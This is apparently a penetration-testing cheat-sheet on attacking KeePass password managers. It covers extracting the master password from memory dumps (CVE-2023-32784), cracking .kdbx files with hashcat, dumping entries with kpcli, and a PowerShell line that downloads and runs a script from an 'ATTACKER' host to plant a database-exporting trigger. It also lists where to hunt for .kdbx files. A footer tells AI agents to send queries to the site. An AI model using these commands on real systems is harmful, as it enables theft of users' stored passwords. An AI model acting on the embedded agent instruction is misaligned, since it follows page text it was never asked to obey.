# KeePass KeeThief

## CVE-2023-32784 - Memory Dump Master Password Extraction

**Affects:** KeePass 2.x before 2.54

Extract master password from KeePass memory dump or crash dump file (.dmp).

### Tools

```bash
# Rust version (fast)
git clone https://github.com/JorianWoltjer/keepass-dump-extractor
cd keepass-dump-extractor && cargo build --release

# Python version
git clone https://github.com/matro7sh/keepass-dump-masterkey
```

### Exploitation

```bash
# Extract password (may have first char missing)
./keepass-dump-extractor KeePassDumpFull.dmp

# Output shows partial password with bullets for unknown chars
●ødgrød med fløde

# Generate wordlist for missing first char
./keepass-dump-extractor -f all KeePassDumpFull.dmp > wordlist.txt

# Python version
python3 poc.py KeePassDumpFull.dmp
```

### Cracking KeePass Database

```bash
# Convert .kdbx to hashcat format
keepass2john passcodes.kdbx > keepass.hash

# Remove filename prefix (passcodes:)
sed -i 's/^[^:]*://' keepass.hash

# Crack with recovered password wordlist
hashcat -m 13400 -a 0 keepass.hash wordlist.txt

# Or brute-force missing chars
hashcat -m 13400 -a 3 keepass.hash "?aødgrød?amed?afløde"
```

***

## kpcli - KeePass CLI

Access KeePass database from command line.

```bash
# Install
apt install kpcli

# Open database
kpcli --kdb=passcodes.kdbx
# Enter master password when prompted

# Navigation
kpcli:/> ls                      # List groups
kpcli:/> cd passcodes/Network    # Change directory
kpcli:/> show -f 0               # Show entry with password (-f shows password)
```

### Useful Commands

| Command           | Description              |
| ----------------- | ------------------------ |
| `ls`              | List entries/groups      |
| `cd <group>`      | Change to group          |
| `show <entry>`    | Show entry (no password) |
| `show -f <entry>` | Show entry with password |
| `find <term>`     | Search entries           |
| `quit`            | Exit                     |

***

## KeeThief Config Trigger (Windows)

Dumps entire database when user logs into KeePass.

```powershell
# Download
IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER:8080/KeePassConfig.ps1')

# Add trigger
Add-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose -ExportPath C:\Windows\Tasks
```

Output CSV format:

```
"Account","Login Name","Password","Web Site","Comments"
"Admin Account","admin","P@ssw0rd","",""
```

***

## Common KeePass Paths

**Windows:**

```
%APPDATA%\KeePass\
C:\Users\<user>\Documents\*.kdbx
C:\Users\<user>\Desktop\*.kdbx
```

**Linux:**

```
~/.keepass/
~/*.kdbx
find / -name "*.kdbx" 2>/dev/null
```

**Memory dumps:**

```
*.dmp
KeePassDumpFull.dmp
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/tool-guides/keepass-keethief.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.